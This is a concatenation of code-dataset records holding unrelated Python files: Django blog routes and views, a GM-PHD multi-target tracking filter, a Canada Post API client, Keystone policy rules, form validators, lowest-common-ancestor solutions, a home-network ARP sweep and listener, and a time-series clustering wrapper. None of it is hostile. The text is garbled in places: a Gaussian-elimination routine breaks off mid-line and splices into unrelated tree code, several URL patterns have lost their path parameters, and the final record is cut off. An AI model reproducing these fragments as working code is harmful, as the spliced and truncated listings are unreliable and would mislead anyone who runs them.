ret\n","sub_path":"contrib/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":23865,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"134270093","text":"from django.urls import path\n\nfrom .views import blog, dashboard, feed, discover\n\nurlpatterns = [\n path('', blog.home, name='home'),\n path('accounts/delete/', dashboard.delete_user, name='user_delete'),\n path('dashboard/', dashboard.dashboard, name='dashboard'),\n path('dashboard/domain/', dashboard.domain_edit, name='domain'),\n path('dashboard/posts/', dashboard.posts_edit, name='post'),\n path('dashboard/posts/new/', dashboard.post_new, name='post_new'),\n path('dashboard/posts//', dashboard.post_edit, name='post_edit'),\n path('dashboard/posts//delete/', dashboard.PostDelete.as_view(),\n name='post_delete'),\n path('discover/', discover.discover, name='discover'),\n\n path('blog/', blog.posts, name='posts'),\n path('hit//', blog.post_hit, name='post_hit'),\n path(\"feed/\", feed.feed, name=\"post_feed\"),\n path('/', blog.post, 
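The reporting code above uses three ORM aggregation shapes worth seeing side by side: `aggregate(Sum(...))` for one grand total, `.values(...).distinct().count()` for distinct users, and `.values(...).annotate(Count(...))` for per-group counts. Condensed against the same `Pledge` model:

from django.db.models import Count, Sum

total = Pledge.objects.aggregate(amount=Sum("amount"))["amount"]
users = Pledge.objects.exclude(user=None).values("user").distinct().count()
repeat_users = (Pledge.objects.exclude(user=None)
                .values("user")
                .annotate(n=Count("id"))
                .filter(n__gt=1)
                .count())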
name='post'),\n]\n","sub_path":"blogs/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":909,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"416240712","text":"import numpy as np\nfrom operator import itemgetter, attrgetter\nfrom scipy.stats import multivariate_normal\nimport math\n\n# !/usr/bin/env python\n# GM-PHD implementation in Python by Dan Stowell modified by Tommaso Fabbri\n#\n# Based on the description in Vo and Ma (2006).\n# (c) 2012 Dan Stowell and Queen Mary University of London.\n# (c) 2016 Tommaso Fabbri and University of Pisa - Automation & Robotics Laboratory\n\n# All rights reserved.\n#\n# NOTE: SPAWNING IS NOT IMPLEMENTED.\n\n\"\"\"\n\nThis file is part of gmphd, GM-PHD filter in python by Dan Stowell.\n\n gmphd is free software: you can redistribute it and/or modify\n it under the terms of the GNU General Public License as published by\n the Free Software Foundation, either version 3 of the License, or\n (at your option) any later version.\n\n gmphd is distributed in the hope that it will be useful,\n but WITHOUT ANY WARRANTY; without even the implied warranty of\n MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n GNU General Public License for more details.\n\n You should have received a copy of the GNU General Public License\n along with gmphd. If not, see .\n\"\"\"\n\n\nclass GmphdComponent(object):\n \"\"\"\n GM-PHD Gaussian component.\n\n The Gaussian component is defined by:\n weight\n mean\n covariance\n id\n detect\n \"\"\"\n weight = 0\n mean = None\n cov = None\n uid = 5\n detect = False\n\n \n \n\n def __init__(self, weight, mean, cov, newid, detect=False):\n\n self.weight = np.float64(weight)\n self.mean = np.array(mean, dtype=np.float64)\n self.mean[2:] = 0\n self.cov = np.array(cov, dtype=np.float64)\n self.id = newid\n self.detect = detect\n\n #print self.mean.size\n\n # self.mean.resize((self.mean.size, 1))\n # self.cov.resize((self.mean.size, self.mean.size))\n\n def __repr__(self):\n str = '\\tWeight: {0}\\n\\tMean: {1}\\n\\tCovariance: {2}\\n\\tID: {3}\\n\\tDetect: {4}\\n'.format(self.weight, self.mean, self.cov, self.id, self.detect)\n return str\n\nclass GMPHD(object):\n def __str__(self):\n\n for i in self.gm:\n return i.__str__()\n\n def __init__(self, birthgmm, survival, detection, f, q, h, r, p0, clutter, merge_thresh, det_thresh=0.3):\n \"\"\"\n 'gm' list of GmphdComponent\n\n 'birthgmm' List of GmphdComponent items which makes up the GMM of birth probabilities.\n 'survival' Survival probability.\n 'detection' Detection probability.\n 'f' State transition matrix F.\n 'q' Process noise covariance Q.\n 'h' Observation matrix H.\n 'r' Observation noise covariance R.\n 'clutter' Clutter intensity.\n \"\"\"\n self.birth_w = 0.001 \n self.gm = []\n self.birthgmm = birthgmm\n\n self.survival = np.float64(survival) # p_{s,k}(x) in paper\n self.detection = np.float64(detection) # p_{d,k}(x) in paper\n \n self.merge_thresh = np.float64(merge_thresh)\n\n self.f = np.array(f, dtype=np.float64) # state transition matrix (F_k-1 in paper)\n self.q = np.array(q, dtype=np.float64) # process noise covariance (Q_k-1 in paper)\n self.h = np.array(h, dtype=np.float64) # observation matrix (H_k in paper)\n self.r = np.array(r, dtype=np.float64) # observation noise covariance (R_k in paper)\n\n self.clutter = np.float64(clutter) # clutter intensity (KAU in paper)\n self.initQ = np.array(p0, dtype=np.float64) # initial value of covariance matrix P_k\n \n self.prev_measures = 
np.zeros((4,1))\n self.det1 = det_thresh\n self.det2 = det_thresh/10\n\n \n\n\n\n def predict_existing(self, born_comps):\n # Prediction for existing targets\n repr(self.gm) \n\n predicted = [GmphdComponent(self.survival * comp.weight,\n np.dot(self.f, comp.mean),\n self.q + np.dot(np.dot(self.f, comp.cov), self.f.T),\n comp.id\n ) for comp in born_comps]\n return predicted\n\n def update(self, measures, predicted):\n # Construction of PHD update components\n #repr(predicted)\n\n # The 'predicted' components are kept, with a decay\n pr_gm = [GmphdComponent(comp.weight * (1.0 - self.detection),\n comp.mean, comp.cov, comp.id, detect=False) for comp in predicted]\n \n \n eta = [np.dot(self.h, comp.mean) for comp in predicted]\n #print 'Eta', eta\n s = [self.r + np.dot(np.dot(self.h, comp.cov), self.h.T) for comp in predicted]\n #print '++++S', s\n\n k = []\n for index, comp in enumerate(predicted):\n k.append(np.dot(np.dot(comp.cov, self.h.T), np.linalg.inv(s[index])))\n\n pkk = []\n for index, comp in enumerate(predicted):\n pkk.append(np.dot(np.eye(np.shape(k[index])[0]) - np.dot(k[index], self.h), comp.cov))\n\n # Update using the measures\n for i in np.ndindex(measures.shape[1]):\n z = measures[:2, i]\n temp_gm = []\n for j, comp in enumerate(predicted):\n '''\n# print \"===Z\", z.squeeze()\n# print 'ETA', eta[j].squeeze()\n# print 'S', s[j]\n# print 'd', np.linalg.norm(z-eta[j])\n ''' \n if np.linalg.norm(z-eta[j]) < 0.9: \n mvn = multivariate_normal(eta[j].squeeze(), s[j])\n mvn_result = mvn.pdf(z.squeeze())\n #print 'mvn', mvn_result \n #print 'weight', comp.weight * mvn_result \n temp_gm.append(GmphdComponent(\n #self.detection * comp.weight * mvn_result*5,\n comp.weight * mvn_result, \n comp.mean + np.dot(k[j], z - eta[j]), pkk[j], comp.id))# comp.cov))\n\n\n # The Kappa thing (clutter and reweight)\n weight_sum = np.sum(comp.weight for comp in temp_gm)\n \n if weight_sum != 0:\n weight_factor = 1.0 / (self.clutter + weight_sum)/1.1\n for comp in temp_gm:\n comp.weight *= weight_factor * self.detection\n pr_gm.extend(temp_gm)\n '''\n allid = np.array([comp.id for comp in pr_gm]) \n# print '--update:', allid\n allid = np.array([comp.weight for comp in pr_gm]) \n# print '--update:', allid \n ''' \n #pr_gm.extend(temp_gm) \n self.gm = pr_gm\n\n def run_iteration(self, measures):#, born_components):\n # Prediction for birthed targets\n #print('Measures: ')\n #print(measures)\n born = self.create_birth(self.prev_measures)\n #pr_born = self.predict_birth(born_components)\n # Prediction for existing targets\n predicted = self.predict_existing(born)\n# print 'Predict: ', len(predicted)\n #print('Predicted components:'.format(predicted))\n # Update\n self.update(measures, predicted)\n# print('Updated components:'.format(self.gm))\n# print len(self.gm)\n # Prune\n self.prune()\n# print('Pruning: '.format(self.gm))\n self.detect()\n #print 'Detect', len(self.gm_high)\n# print len(self.gm)\n self.prev_measures = measures\n\n \n def prune(self, truncation_thresh=1e-4, max_components=40):\n temp_sum_0 = np.sum([i.weight for i in self.gm])\n\n # Truncation step\n I = filter(lambda comp: comp.weight > truncation_thresh, self.gm)\n l = 0 # count the number of features/components\n pruned_gm = []\n '''\n allid = np.array([comp.id for comp in I]) \n# print '--prune:', allid\n allid = np.array([comp.weight for comp in I]) \n# print '--prune:', allid \n ''' \n # Merge step\n while len(I) > 0:\n l += 1\n j = np.argmax(i.weight for i in I)\n L = []\n indexes = []\n for index, i in enumerate(I):\n temp = 
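The `update` method above computes the standard Kalman quantities per predicted component: predicted measurement eta = Hx, innovation covariance S = R + HPH^T, gain K = PH^T S^-1, and posterior covariance (I - KH)P. One component worked in plain numpy to make the shapes concrete (a 4-state position/velocity model with a position-only observation, matching the record's `mean[2:] = 0` convention; values are illustrative):

import numpy as np

x = np.array([1.0, 2.0, 0.0, 0.0])             # state: x, y, vx, vy
P = np.eye(4)                                  # state covariance
H = np.hstack([np.eye(2), np.zeros((2, 2))])   # observe position only
R = 0.1 * np.eye(2)                            # measurement noise
z = np.array([1.2, 1.9])                       # one measurement

eta = H @ x                                    # predicted measurement
S = R + H @ P @ H.T                            # innovation covariance
K = P @ H.T @ np.linalg.inv(S)                 # Kalman gain
x_new = x + K @ (z - eta)                      # updated mean
P_new = (np.eye(4) - K @ H) @ P                # updated covariance

The component weight is then rescaled by the Gaussian likelihood, multivariate_normal(eta, S).pdf(z), which is exactly the role `mvn_result` plays above.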
np.dot((i.mean - I[j].mean).T, np.linalg.inv(i.cov+np.eye(4)*0.00001))\n mah_dist = np.float64(np.dot(temp, (i.mean - I[j].mean)))\n mindist = np.linalg.norm(i.mean[:2]-I[j].mean[:2]) \n #print '==cov', i.cov \n #print 'mah_dist', mah_dist\n #print 'min_dist', mindist\n if mindist <= self.merge_thresh: \n #if mah_dist <= self.merge_thresh:\n L.append(i)\n indexes.append(index)\n if len(L):\n temp_weight = np.sum([i.weight for i in L])\n temp_mean = (1.0 / temp_weight) * np.sum([i.weight * i.mean for i in L], axis=0)\n\n '''\n temp_cov = np.zeros((temp_mean.size, temp_mean.size))\n for i in L:\n #print 'TM', temp_mean\n #print i.mean\n temp_cov += (i.cov + np.dot((temp_mean - i.mean).T, (temp_mean - i.mean)))\n '''\n #imax = np.argmax([i.weight for i in L])\n temp_cov = I[j].cov #zquang: cov from the highest prob. component\n #print 'max', L[imax].weight, 'cov', temp_cov\n temp_id = I[j].id\n \n pruned_gm.append(GmphdComponent(temp_weight, temp_mean, temp_cov, temp_id))\n I = [i for j, i in enumerate(I) if j not in indexes]\n pruned_gm.sort(key=attrgetter('weight'))\n pruned_gm.reverse()\n pruned_gm = pruned_gm[:max_components]\n temp_sum_1 = np.sum(i.weight for i in pruned_gm)\n for i in pruned_gm:\n i.weight *= temp_sum_0 / temp_sum_1\n if i.weight > 1.5:\n i.weight = 1.5\n\n # tag name\n ''' \n allid = np.array([comp.id for comp in pruned_gm]) \n# print '++tag:', allid\n allid = np.array([comp.weight for comp in pruned_gm]) \n# print '++w:', allid \n ''' \n while(len(np.array([comp.id for comp in pruned_gm])) != len(np.unique(np.array([comp.id for comp in pruned_gm])))):\n allid = np.array([comp.id for comp in pruned_gm])\n uniqueid = np.unique(allid)\n for ii, comp in enumerate(pruned_gm):\n for jj, comp2 in enumerate(pruned_gm):\n if ii< jj and comp.id == comp2.id:\n allid = np.array([comp.id for comp in pruned_gm])\n allw = np.array([comp.weight for comp in pruned_gm])\n \n #print 'allid', allid\n newid = 1\n for ind in range(max(allid)+2):\n if min(abs(allid - ind)) > 0:\n newid = ind\n break\n #print 'newid', newid, ii, jj\n if pruned_gm[ii].weight > pruned_gm[jj].weight:\n pruned_gm[jj].id = newid\n else:\n pruned_gm[ii].id = newid\n \n break\n \n \n ''' \n allid = np.array([comp.id for comp in pruned_gm]) \n# print '++merge:', allid\n allid = np.array([comp.weight for comp in pruned_gm]) \n# print '++w:', allid \n #print self.gm\n ''' \n self.gm = pruned_gm\n\n def detect(self):\n for i, comp in enumerate(self.gm):\n if not comp.detect:\n if comp.weight > self.det1:\n self.gm[i].detect = True\n\n if comp.detect:\n if comp.weight < self.det2:\n self.gm[i].detect = False\n \n \n def create_birth(self, measures):\n #sigma_r = 10/3#2.0/3\n #R = [[math.pow(2*sigma_r, 2), 0], [0, math.pow(2*sigma_r, 2)]]\n #sigma_q = 0.25#1e-3 \n #Q = [[math.pow(sigma_q, 2), 0, 0, 0], [0, math.pow(sigma_q, 2), 0, 0], [0, 0, 5, 0], [0, 0, 0, 5]] \n\n\n it = np.nditer(measures.shape[1])\n born = []\n if not len(self.gm):\n self.gm = [GmphdComponent(self.birth_w, measures[:,i], self.initQ, 2) for i in np.ndindex(measures.shape[1])]\n \n #print 'GM', self.gm \n #print 'measure', measures \n for i in np.ndindex(measures.shape[1]):\n #born.append(GmphdComponent(GMPHD.birth_w, measures[:,i], Q))\n mindist = 10\n z = measures[:,i]\n for j, comp in enumerate(self.gm):\n #print 'comp', comp\n if np.linalg.norm(z[:2]-comp.mean[:2]) < mindist: \n mindist = np.linalg.norm(z[:2]-comp.mean[:2])\n \n if mindist > 0.6:\n allid = np.array([comp.id for comp in self.gm])\n #print 'allid', allid\n newid = 1\n for ind in 
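The merge loop above collapses components whose means fall within `merge_thresh` (the Mahalanobis computation is present, but the Euclidean `mindist` gate is what decides) into one component carrying the summed weight and the weight-averaged mean. The moment-matching step on its own (this sketch merges only the means; the record keeps the covariance of the strongest component):

import numpy as np

weights = np.array([0.6, 0.3])
means = np.array([[1.0, 2.0],
                  [1.1, 2.1]])

# Euclidean gate, as in the `mindist <= self.merge_thresh` branch.
if np.linalg.norm(means[0] - means[1]) <= 0.5:
    w = weights.sum()
    merged = (weights[:, None] * means).sum(axis=0) / w
    # -> weight 0.9, mean ~ [1.033, 2.033]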
range(max(allid)+4):\n if min(abs(allid - ind)-1) > 0:\n newid = ind\n break\n #print 'newid', newid\n #born.append(GmphdComponent(self.birth_w, measures[:,i], self.initQ, newid)) \n self.gm.append(GmphdComponent(self.birth_w, measures[:,i], self.initQ, newid))\n #print '----new born', self.gm[-1]\n \n #self.gm.extend(born)\n \n allid = np.array([comp.id for comp in self.gm])\n #print '++birth', allid\n \n return self.gm\n\n","sub_path":"src/sp_hl_hd_op/convertwhere/gmphd4.py","file_name":"gmphd4.py","file_ext":"py","file_size_in_byte":14345,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"221718119","text":"from .base import BaseApi, method\nfrom ..https import Methods\nfrom ..objects.price_quotes import PriceQuotes\nfrom ..objects.services import Services\nfrom ..objects.service import Service\nfrom ..objects.option import Option\n\n\nclass Rating(BaseApi):\n\n @method(\n '/rs/ship/price',\n 'application/vnd.cpc.ship.rate-v4+xml',\n xmlns='http://www.canadapost.ca/ws/ship/rate-v4',\n method=Methods.POST\n )\n def get_rates(self, data, ns):\n node = self.parse_xml(data)\n return PriceQuotes.from_xml(node)\n\n @method(\n '/rs/ship/service',\n # 'application/vnd.cpc.ship.rate-v4+xml',\n xmlns='http://www.canadapost.ca/ws/ship/rate-v4',\n headers={\n \"Accept\": \"application/vnd.cpc.ship.rate-v4+xml\"\n },\n method=Methods.GET,\n )\n def get_services(self, data, ns):\n node = self.parse_xml(data)\n return Services.from_xml(node)\n\n @method(\n '/rs/ship/service/%(service)s',\n 'application/vnd.cpc.ship.rate-v4+xml',\n xmlns='application/vnd.cpc.ship.rate-v4+xml',\n method=Methods.GET\n )\n def get_service(self, data, ns):\n node = self.parse_xml(data)\n return Service.from_xml(node)\n\n @method(\n '/rs/ship/option/%(option)s',\n 'application/vnd.cpc.ship.rate-v4+xml',\n xmlns='application/vnd.cpc.ship.rate-v4+xml',\n method=Methods.GET\n )\n def get_option(self, data, ns):\n node = self.parse_xml(data)\n return Option.from_xml(node)\n","sub_path":"src/canadapost/api/rating.py","file_name":"rating.py","file_ext":"py","file_size_in_byte":1524,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"242683504","text":"from django.shortcuts import render, redirect, get_object_or_404\nfrom .models import Periodista\nfrom .forms import ObjetoForm\n\n\n# Create your views here.\ndef Inicio(request):\n return render(request,'Inicio.html')\n\n\ndef Lista(request):\n periodistas = Periodista.objects.all()\n return render(request,'Lista.html', context={'periodistas': periodistas},)\n\ndef form_objeto(request):\n if request.method == \"POST\":\n objeto_form = ObjetoForm(request.POST,request.FILES)\n if objeto_form.is_valid():\n post = objeto_form.save(commit=False)\n post.save()\n return redirect('Lista')\n else:\n objeto_form = ObjetoForm()\n return render(request, 'core/form_objeto.html', {'objeto_form': objeto_form})\n\ndef mod_objeto(request, pk):\n post = get_object_or_404(Periodista, pk=pk)\n if request.method == \"POST\":\n objeto_form = ObjetoForm(request.POST, request.FILES, instance=post)\n if objeto_form.is_valid():\n post = objeto_form.save()\n post.save()\n return redirect('Lista')\n else:\n objeto_form = ObjetoForm(instance=post)\n return render(request, 'core/mod_objeto.html', {'objeto_form': objeto_form})\n\ndef delete_objeto(request, pk):\n objeto = Periodista.objects.get(pk=pk)\n objeto.delete()\n return 
redirect('Lista')\n","sub_path":"core/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1344,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"490504175","text":"def find_p(A,i,NROW):\n\tmaxest=0\n\tn=len(A[0])-1\n\tfor j in range(i,n+1,1):\n\t\ttemp=NROW[j]\n\t\tif maxest= 2:\n self.ans = current_node\n\n # Return True if either of the three bool values is True.\n return mid or left or right\n\n # Traverse the tree\n recurse_tree(root)\n return self.ans\n\n\nclass Solution2:\n\n def lowestCommonAncestor(self, root, p, q):\n \"\"\"\n :type root: TreeNode\n :type p: TreeNode\n :type q: TreeNode\n :rtype: TreeNode\n \"\"\"\n\n # Stack for tree traversal\n stack = [root]\n\n # Dictionary for parent pointers\n parent = {root: None}\n\n # Iterate until we find both the nodes p and q\n while p not in parent or q not in parent:\n\n node = stack.pop()\n\n # While traversing the tree, keep saving the parent pointers.\n if node.left:\n parent[node.left] = node\n stack.append(node.left)\n if node.right:\n parent[node.right] = node\n stack.append(node.right)\n\n # Ancestors set() for node p.\n ancestors = set()\n\n # Process all ancestors for node p using parent pointers.\n while p:\n ancestors.add(p)\n p = parent[p]\n\n # The first ancestor of q which appears in\n # p's ancestor set() is their lowest common ancestor.\n while q not in ancestors:\n q = parent[q]\n return q\n","sub_path":"codes/Aiamjay/Week2-Day2/236. Lowest Common Ancestor of a Binary Tree.py","file_name":"236. Lowest Common Ancestor of a Binary Tree.py","file_ext":"py","file_size_in_byte":3366,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"500365461","text":"from processor.engine.app import create_app\n\n\nrun_app = create_app()\nwith run_app.app_context():\n from processor.controllers import *\n\n\nif __name__ == \"__main__\":\n run_app.run(\n host=\"0.0.0.0\",\n port=2525,\n debug=True,\n threaded=True\n )\n","sub_path":"image_processor_final/image_processor/initate_app.py","file_name":"initate_app.py","file_ext":"py","file_size_in_byte":274,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"279953850","text":"# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 
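Both LCA solutions above assume the usual LeetCode `TreeNode`, whose definition fell into the extraction gap earlier in this record. A minimal reconstruction plus a driver, assuming that interface (the recursive `Solution` additionally expects `self.ans` to have been initialized, e.g. to None, in its lost `__init__`):

class TreeNode:
    def __init__(self, val=0, left=None, right=None):
        self.val, self.left, self.right = val, left, right

#       3
#      / \
#     5   1
root = TreeNode(3, TreeNode(5), TreeNode(1))
lca = Solution2().lowestCommonAncestor(root, root.left, root.right)
print(lca.val)  # 3 -- the root is the lowest node containing both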
See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\nfrom oslo_policy import policy\n\nfrom keystone.common.policies import base\n\ndomain_policies = [\n policy.DocumentedRuleDefault(\n name=base.IDENTITY % 'get_domain',\n check_str=base.RULE_ADMIN_OR_TARGET_DOMAIN,\n description='Show domain details.',\n operations=[{'path': '/v3/domains/{domain_id}',\n 'method': 'GET'}]),\n policy.DocumentedRuleDefault(\n name=base.IDENTITY % 'list_domains',\n check_str=base.RULE_ADMIN_REQUIRED,\n description='List domains.',\n operations=[{'path': '/v3/domains',\n 'method': 'GET'}]),\n policy.DocumentedRuleDefault(\n name=base.IDENTITY % 'create_domain',\n check_str=base.RULE_ADMIN_REQUIRED,\n description='Create domain.',\n operations=[{'path': '/v3/domains',\n 'method': 'POST'}]),\n policy.DocumentedRuleDefault(\n name=base.IDENTITY % 'update_domain',\n check_str=base.RULE_ADMIN_REQUIRED,\n description='Update domain.',\n operations=[{'path': '/v3/domains/{domain_id}',\n 'method': 'PATCH'}]),\n policy.DocumentedRuleDefault(\n name=base.IDENTITY % 'delete_domain',\n check_str=base.RULE_ADMIN_REQUIRED,\n description='Delete domain.',\n operations=[{'path': '/v3/domains/{domain_id}',\n 'method': 'DELETE'}])\n]\n\n\ndef list_rules():\n return domain_policies\n","sub_path":"keystone/common/policies/domain.py","file_name":"domain.py","file_ext":"py","file_size_in_byte":1975,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"438940478","text":"import re\n\nfrom django.core import validators\nfrom django.core.exceptions import ValidationError\nfrom django.utils.deconstruct import deconstructible\nfrom django.utils.translation import gettext_lazy as _\n\n\n@deconstructible\nclass UsernameValidator(validators.RegexValidator):\n regex = r'^[\\w.-]+$'\n message = _(\n 'Enter a valid username. This value may contain only letters, '\n 'numbers, and @/./+/-/_ characters.'\n )\n flags = 0\n\n\n@deconstructible\nclass PhoneNumberValidator(validators.RegexValidator):\n regex = r'^\\+?1?\\d{9,15}$'\n message = _(\n \"Phone number must be entered in the format: '+999999999'. 
Up to 15 digits allowed.\"\n )\n flags = 0\n","sub_path":"django-project/lean_auth/validators.py","file_name":"validators.py","file_ext":"py","file_size_in_byte":690,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"593835938","text":"import arppy as arppy\nimport comms as comms\nimport time as time\nimport json as json\n\nimport const as c\nimport devicetable as devtbl\n\n\nclass SmartARPListener(arppy.ARPListener):\n\n def __init__(self, sys_settings_fname=None):\n super().__init__(sys_settings_fname)\n self.comms = comms.Comms(sys_settings_fname)\n\n def smart_arp_listen_routine(self):\n # Get an ethernet packet\n self.recv_ethernet_packet()\n\n # Send out arp data if it was an arp packet and not a broadcast\n # from the device running this code\n if self.is_arp_packet() and not self.is_known_broadcast():\n self.unpack_eth_payload_into_arp_data()\n self.comms.send_msg('new_arp_pkt', self.get_styled_arp_data())\n\n def is_known_broadcast(self):\n dst_mac = self.ethernet_data['dest_mac_as_bytes']\n cond1 = dst_mac == c.arp_broadcast_eth_dest_mac\n\n src_mac = self.ethernet_data['src_mac_as_bytes']\n cond2 = src_mac == self.net_interface.get_interface_mac()\n\n return cond1 and cond2\n\n def clean_up(self):\n super().clean_up()\n self.comms.close_pub_sub()\n\n\nclass SmartARPSender(arppy.ARPSender):\n\n def __init__(self, sys_settings_fname, device_table_fname):\n super().__init__(sys_settings_fname)\n self.device_table_fname = device_table_fname\n self.sub_list = [b'new_table']\n self.comms = comms.Comms(sys_settings_fname)\n self.comms.set_subscriptions(self.sub_list)\n\n self.device_list = devtbl.load_device_table(device_table_fname)\n self.device_lut = devtbl.update_device_lut(self.device_list)\n\n self.setup_broadcast_and_direct_intervals(sys_settings_fname)\n\n self.prev_broadcast_t = 0\n self.prev_direct_arp_t = 0\n\n def setup_broadcast_and_direct_intervals(self, sys_settings_fname):\n with open(sys_settings_fname, 'r') as f:\n self.sys_settings = json.load(f)\n\n self.broadcast_interval_s = max(\n self.sys_settings['broadcast_interval_s'],\n 10\n )\n num_direct = self.sys_settings['num_direct_msgs_between_broadcast']\n self.direct_interval_s = max(\n self.broadcast_interval_s / (num_direct + 1),\n 5\n )\n\n def smart_arp_send_routine(self):\n cur_time = time.time()\n\n # Periodically send a broadcast to update IPs\n # and find new MACs\n if cur_time - self.prev_broadcast_t > self.broadcast_interval_s:\n # print('broadcast', cur_time)\n self.prev_broadcast_t = cur_time\n self.send_broadcast()\n\n # Periodically send direct arp requests to\n # each mac/ip pair in the table\n if (cur_time - self.prev_direct_arp_t > self.direct_interval_s) and \\\n (cur_time - self.prev_broadcast_t > self.direct_interval_s):\n # print('direct', cur_time)\n self.prev_direct_arp_t = cur_time\n self.send_direct()\n\n # Check for new mac tables\n msg = self.comms.recv_msg()\n if msg:\n self.replace_old_table(msg)\n\n time.sleep(0.1)\n\n def send_broadcast(self):\n ip_addr = self.net_interface.get_interface_ip('str_dots')\n ip_hdr = '.'.join(ip_addr.split('.')[:-1])\n\n for ii in range(256):\n dst_ip = ip_hdr + '.{}'.format(ii)\n self.send_arp_request(dst_ip)\n time.sleep(0.006)\n\n def send_direct(self):\n for key in self.device_lut:\n dst_mac = self.device_lut[key]['mac']\n dst_ip = self.device_lut[key]['ip']\n self.send_arp_request(dst_ip, dst_mac)\n time.sleep(0.006)\n\n def replace_old_table(self, msg):\n self.device_list = 
json.loads(msg[1].decode('utf-8'))\n self.device_lut = devtbl.update_device_lut(self.device_list)\n\n def clean_up(self):\n super().clean_up()\n self.comms.close_pub_sub()\n\n\nif __name__ == '__main__':\n import sys\n sys_settings_fname = 'sys_settings.json'\n device_table_fname = 'device_table.json'\n\n if 'listen' in sys.argv:\n listener = SmartARPListener(sys_settings_fname)\n\n is_running = True\n print('Starting arp listener...')\n while is_running:\n try:\n listener.smart_arp_listen_routine()\n except KeyboardInterrupt:\n print('closing arp listener')\n is_running = False\n listener.clean_up()\n elif 'send' in sys.argv:\n sender = SmartARPSender(sys_settings_fname, device_table_fname)\n\n is_running = True\n print('Starting arp sender...')\n while is_running:\n try:\n sender.smart_arp_send_routine()\n except KeyboardInterrupt:\n print('Closing arp sender')\n is_running = False\n sender.clean_up()\n","sub_path":"homenet/smartarp.py","file_name":"smartarp.py","file_ext":"py","file_size_in_byte":4861,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"38131066","text":"import sys\nimport os.path\nimport numpy as np\nimport pandas\n\nfrom Sloth import Sloth\nfrom tslearn.datasets import CachedDatasets\n\nfrom d3m.primitive_interfaces.transformer import TransformerPrimitiveBase\nfrom d3m.primitive_interfaces.base import CallResult\n\nfrom d3m import container, utils\nfrom d3m.container import DataFrame as d3m_DataFrame\nfrom d3m.metadata import hyperparams, base as metadata_base\nfrom d3m.primitives.datasets import DatasetToDataFrame\nfrom common_primitives import utils as utils_cp\n\nfrom timeseriesloader.timeseries_loader import TimeSeriesLoaderPrimitive\n\n__author__ = 'Distil'\n__version__ = '2.0.1'\n\nInputs = container.pandas.DataFrame\nOutputs = container.pandas.DataFrame\n\nclass Hyperparams(hyperparams.Hyperparams):\n algorithm = hyperparams.Enumeration(default = 'GlobalAlignmentKernelKMeans', \n semantic_types = ['https://metadata.datadrivendiscovery.org/types/ControlParameter'],\n values = ['GlobalAlignmentKernelKMeans', 'TimeSeriesKMeans', 'DBSCAN', 'HDBSCAN'],\n description = 'type of clustering algorithm to use')\n nclusters = hyperparams.UniformInt(lower=1, upper=sys.maxsize, default=3, semantic_types=\n ['https://metadata.datadrivendiscovery.org/types/TuningParameter'], description = 'number of clusters \\\n to user in kernel kmeans algorithm')\n eps = hyperparams.Uniform(lower=0, upper=sys.maxsize, default = 0.5, semantic_types = \n ['https://metadata.datadrivendiscovery.org/types/TuningParameter'], \n description = 'maximum distance between two samples for them to be considered as in the same neigborhood, \\\n used in DBSCAN algorithm')\n min_samples = hyperparams.UniformInt(lower=1, upper=sys.maxsize, default = 5, semantic_types = \n ['https://metadata.datadrivendiscovery.org/types/TuningParameter'], \n description = 'number of samples in a neighborhood for a point to be considered as a core point, \\\n used in DBSCAN and HDBSCAN algorithms') \n pass\n\nclass Storc(TransformerPrimitiveBase[Inputs, Outputs, Hyperparams]):\n \"\"\"\n Produce primitive's best guess for the cluster number of each series.\n \"\"\"\n metadata = metadata_base.PrimitiveMetadata({\n # Simply an UUID generated once and fixed forever. Generated using \"uuid.uuid4()\".\n 'id': \"77bf4b92-2faa-3e38-bb7e-804131243a7f\",\n 'version': __version__,\n 'name': \"Sloth\",\n # Keywords do not have a controlled vocabulary. 
Authors can put here whatever they find suitable.\n 'keywords': ['Time Series','Clustering'],\n 'source': {\n 'name': __author__,\n 'uris': [\n # Unstructured URIs.\n \"https://github.com/NewKnowledge/sloth-d3m-wrapper\",\n ],\n },\n # A list of dependencies in order. These can be Python packages, system packages, or Docker images.\n # Of course Python packages can also have their own dependencies, but sometimes it is necessary to\n # install a Python package first to be even able to run setup.py of another package. Or you have\n # a dependency which is not on PyPi.\n 'installation': [{\n 'type': metadata_base.PrimitiveInstallationType.PIP,\n 'package': 'cython',\n 'version': '0.28.5',\n },{\n 'type': metadata_base.PrimitiveInstallationType.PIP,\n 'package_uri': 'git+https://github.com/NewKnowledge/sloth-d3m-wrapper.git@{git_commit}#egg=SlothD3MWrapper'.format(\n git_commit=utils.current_git_commit(os.path.dirname(__file__)),\n ),\n }],\n # The same path the primitive is registered with entry points in setup.py.\n 'python_path': 'd3m.primitives.distil.Sloth.cluster',\n # Choose these from a controlled vocabulary in the schema. If anything is missing which would\n # best describe the primitive, make a merge request.\n 'algorithm_types': [\n metadata_base.PrimitiveAlgorithmType.SPECTRAL_CLUSTERING,\n ],\n 'primitive_family': metadata_base.PrimitiveFamily.TIME_SERIES_SEGMENTATION,\n })\n\n def __init__(self, *, hyperparams: Hyperparams, random_seed: int = 